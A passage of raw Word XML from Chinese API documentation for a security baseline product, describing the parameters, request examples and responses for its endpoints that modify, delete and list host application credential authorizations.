          <w:p w14:paraId="656587DC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机范围，1-自定义，包括业务组、主机；0-全部主机，必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="02CDED98" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13CF2427" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CAA9576" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07347735" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组列表，如果realmType=1, 则agentIds和groups至少有一个不为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="69FA4EED" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3120A2AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C0DCB79" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4843BEC4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机列表，如果realmType=1, 则agentIds和groups至少有一个不为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="41118DE8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42B2BF40" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>appName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E5FDC54" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E9479CE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>应用名, 必填,范围:MySQL,WebLogic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="265EFF7C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="597DCE5A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>userName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A624110" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3666F202" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户名, 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3EFB5BF2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="257BF9D6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="202C4CA7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E856833" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="647ADDB5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C033093" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="316B5331" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D6345D4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>原授权id，必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="51EE2B85" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58986728" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69BA53C7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C2CE8DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="54DC2E59" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="390860DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>params</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1178C612" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Map</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61535476" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>存放token</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7A513E25" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DEAF35C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>modifyPassword</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5986E0E5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>布尔值</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="266E8E2E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>当修改密码时，需指定modifyPassword＝true,其他情况可默认不填</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="19C9FD91" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75115B58" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "osType": 1,  //1：linux； 2：windows， 必填</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "realmType": 1,  //主机范围，1：自定义，包括业务组、主机； 0：全部主机， 必填</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "groups": [1],  //业务组列表，如果realmType=1, 则agentIds和groups至少有一个不为空</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "agentIds": ["xx1", "xx2"],  //主机列表，如果realmType=1, 则agentIds和groups至少有一个不为空</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "appName": "MySQL",  //应用名, 必填</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "userName": "admin",  //用户名, 必填</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "password": "admin",  //密码</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "id": "5ceb46b97d761b0bd9c44314",  //原授权id，必填</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "port": 3306,  //端口</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "params": {      "authToken": "1da285b0062c4b0ca56f24dfce25b7f8",  //授权token，由前端传入，必填</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    }，</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">　　 "modifyPassword": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EA3D99" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7649EF85" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    true/false</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D76B276"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630"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="2394569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DA91723" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AE94B04" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62EFC639" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="770F74EB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CCACF8D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B890EE4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>布尔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="340D2349" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="27054D90" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="190" w:name="删除授权请求"/>
      <w:bookmarkEnd w:id="189"/>
      <w:r>
        <w:t>删除授权请求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117D6043" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E2A0BE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>DELETE /external/api/baseline/auth/{linux，win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3D478E"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944"/>
        <w:gridCol w:w="1220"/>
        <w:gridCol w:w="3139"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="34AFBCD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FEEE4B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AC8D098" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24F70CB8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1BB0A245" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54EC87AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>comId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="111DF68E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45885EFB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>公司id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4E6CCE6D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="624DF7CC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>uuid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="642838EE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="761CEAE8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5A63BB3F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F380716" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>osType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6374A883" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D719B69" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1：linux； 2：windows， 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6E8F0BE6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F135141" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ids</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6320FDA2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03AF1396" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id列表， 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1BD4DEEA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00C86F6B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>params</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24670EE6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Map</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20B35BC9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>存放token</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="50786B45" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B8175D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "osType": 1,  //1：linux； 2：windows， 必填</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "ids": ["5a18eaab3171a748ec593837"],  //id列表， 必填</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "params": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "authToken": "1da285b0062c4b0ca56f24dfce25b7f8",  //授权token，由前端传入，必填</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F650C1F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728EEA15" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    true/false</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB72C40"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630"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="5EF333A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1298092" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10363B7B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B949A61" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0C809975" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3311AB9E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47F1A257" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>布尔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BEDCA8F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C8BD840" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="191" w:name="查询授权请求"/>
      <w:bookmarkEnd w:id="190"/>
      <w:r>
        <w:t>查询授权请求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF3D24F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D81058" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/baseline/auth/list/{linux，win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F7CC2D"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224"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="2964"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="1BC8C4D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7608368" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C9E1B4D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
